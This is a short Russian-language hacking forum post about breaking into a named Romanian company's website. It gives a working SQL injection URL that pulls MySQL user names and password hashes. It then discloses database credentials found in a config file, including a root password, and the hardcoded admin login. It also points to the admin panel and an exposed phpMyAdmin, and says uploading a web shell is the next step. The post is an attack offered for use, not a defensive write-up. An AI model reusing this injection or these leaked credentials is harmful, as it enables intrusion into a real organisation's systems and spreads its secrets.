http://www.ricosrl.ro

Крутится на 4м мускуле. Хитрый администратор сдул подчистую эту партию.

Дыра:
http://www.ricosrl.ro/lucrari/lucrare.php?lucrare=-1+union+select+concat_ws(0x3a3a,User,password,user ()),2,3+from+mysql.user/*

Таблицы не подбрутились, но чудо-юзер имеет FILE_PRIV = YES. Порывшись в скриптах, находим конфиг и в нем:

define('_HOST','localhost');
define('_USER','root');
define('_PASS','rico1991');
define('_DATABASE','photon_rico');

Детально изучив файлы отвечающие за аутентификацию - видим, что логин жестко забит в скрипте, а именно:
login: user
Пароль же берется от регов указанных в конфиге к БД:
pass: rico1991


http://www.ricosrl.ro/administrare/ <- сама админка

Но админка беспонтовая и шелл через нее не залить, поэтому смотрим дальше.

http://www.ricosrl.ro/admin/ <- лежит пхпмайадмин

Берем реги из конфига и коннектимся.

Как залить шелл далее понятно =)